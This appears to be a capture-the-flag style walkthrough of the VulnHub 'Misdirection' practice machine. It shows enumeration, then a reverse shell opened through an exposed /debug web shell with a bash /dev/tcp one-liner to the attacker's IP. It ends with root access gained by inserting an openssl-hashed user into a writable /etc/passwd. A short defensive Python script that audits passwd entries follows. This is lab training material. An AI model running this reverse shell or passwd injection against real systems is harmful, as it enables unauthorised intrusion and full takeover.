Hacking MISDIRECTION - VulnHub

(OSCP similar practice machine)

Vulnhub Description

The purpose of this machine is to let OSCP students further develop, strengthen, and practice their methodology for the exam.

So let’s dive into pwning the machine and gaining a root shell.

______________________________________

Target I.P → 192.168.230.134 | Attacker’s I.P → 192.168.230.128

To start, let’s go for scanning and enumeration. I got the following results:

Hmm.. we got some standard ports. Both 80 and 8080 have a web page up and running, so first I hopped over to http://192.168.230.128:8080.

After that I brute-forced the web directories to find some way in, and the results that showed up are:

After enumerating all of these, the interesting ones I found are:

/debug , /wordpress

WordPress was hardcoded with the I.P 192.168.1.61:8080. Either I update my /etc/hosts file or I review it later (because I have my doubts, given the machine’s name ;-/)

So I jumped to http://192.168.230.134/debug. Looks like a shell, AWESOME!!!!

So I ran this command to get a reverse shell:

/bin/bash -c '/bin/bash>/dev/tcp/192.168.230.128/9999 0>&1 2>&1 &'

My box was listening on this port, and YES!! we got a shell. I checked the allowed sudo permissions, and we got something very easily:

Okay, so without further ado, as per the results, I switched to bretix. This user is allowed to edit /etc/passwd. AWESOME!!!

Now we are going to create a user on the target machine by adding its entry to the /etc/passwd file. Here we’ll be using openssl to generate a salted hash:

openssl passwd -1 -salt user3 pass123

Back on the target machine, we use the hash generated in the previous step to add a user neelesh with elevated privileges. Now all we have to do is run the su command with the user name we just created, enter the password, and we have a root shell.

And we are root!!
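From the defender's side, both the editable /etc/passwd and the entry added to it are easy to spot. The Python check below is an added example, not part of the original write-up: the sample lines are constructed, the hash is a placeholder, and giving the new user UID 0 is an assumption about what "elevated privilege" meant here.

```python
import os
import stat

# Constructed sample, not copied from the target. The last line models the kind of
# entry described above: a hash in field 2 and (assumption) UID 0.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
bretix:x:1000:1000::/home/bretix:/bin/bash
neelesh:$1$user3$CONSTRUCTEDPLACEHOLDER:0:0:root:/root:/bin/bash
"""

def audit_passwd_text(text):
    """Return (account, finding) tuples for suspicious passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 on a non-root account"))
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw != "x" and not pw.startswith(("*", "!")):
            # Anything else is a hash that su/login will accept, bypassing /etc/shadow.
            findings.append((name, "password hash stored in /etc/passwd"))
    return findings

def audit_passwd_mode(path="/etc/passwd"):
    """Flag ownership or write bits that let a non-root user edit the file."""
    st = os.stat(path)
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path} owned by uid {st.st_uid}, expected 0")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} is group- or world-writable ({stat.filemode(st.st_mode)})")
    return findings

if __name__ == "__main__":
    for who, what in audit_passwd_text(SAMPLE_PASSWD):
        print(f"[!] {who}: {what}")
    for what in audit_passwd_mode():
        print(f"[!] {what}")
```

On a healthy system /etc/passwd is owned by root with mode 0644 and every password field is x, so both functions return nothing.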

That’s all for now,

Until Next Time,

I’m Neelesh, Thanks for the read…

— — — — — — — — — — — — — →

Ping me if you face any issues

Linkedin:- https://www.linkedin.com/in/user-neeleshpatel/

— — — — — — — — — — — — — →

Neelesh Patel
